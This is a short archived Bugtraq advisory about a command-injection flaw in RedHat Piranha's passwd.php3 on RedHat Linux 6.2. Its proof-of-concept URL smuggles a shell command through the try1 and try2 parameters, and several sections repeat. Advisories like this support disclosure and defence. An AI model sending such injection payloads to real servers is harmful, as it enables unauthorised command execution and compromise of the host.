RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution Vulnerability
BID:1149
Info
RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution Vulnerability
| Bugtraq ID: | 1149 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 24 2000 12:00AM |
| Updated: | Apr 24 2000 12:00AM |
| Credit: | This vulnerability was announced on April 24, 2000 in an advisory from ISS. Exploit details were provided in a post to the Bugtraq mailing list by Max Vision <[email protected]> |
| Vulnerable: |
Redhat piranha-gui-0.4.12-1.i386.rpm Redhat Linux 6.2 sparc Redhat Linux 6.2 i386 Redhat Linux 6.2 alpha |
| Not Vulnerable: | |
Discussion
RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution Vulnerability
A vulnerability exists in the passwd.php3 cgi-bin script, as included by RedHat as part of the Piranha virtual server package, in RedHat Linux 6.2. Due to improper checking of input, it is possible for any user who can authenticate to the Piranha package to execute arbitrary commands, with the effective id of the web server. This may be used to leverage access to the machine, resulting in further compromise.
A vulnerability exists in the passwd.php3 cgi-bin script, as included by RedHat as part of the Piranha virtual server package, in RedHat Linux 6.2. Due to improper checking of input, it is possible for any user who can authenticate to the Piranha package to execute arbitrary commands, with the effective id of the web server. This may be used to leverage access to the machine, resulting in further compromise.
Exploit / POC
RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution Vulnerability
Execute the following url, using a username and password to authenticate: http://victim.example.com/piranha/secure/passwd.php3
Next, execute the following: http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT
This will touch a file in /tmp named r00ted. More complex attacks are certainly possible.
Execute the following url, using a username and password to authenticate: http://victim.example.com/piranha/secure/passwd.php3
Next, execute the following: http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT
This will touch a file in /tmp named r00ted. More complex attacks are certainly possible.
Solution / Fix
References
RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution Vulnerability
References:
References:
- Updates, Fixes, and Errata Page (RedHat)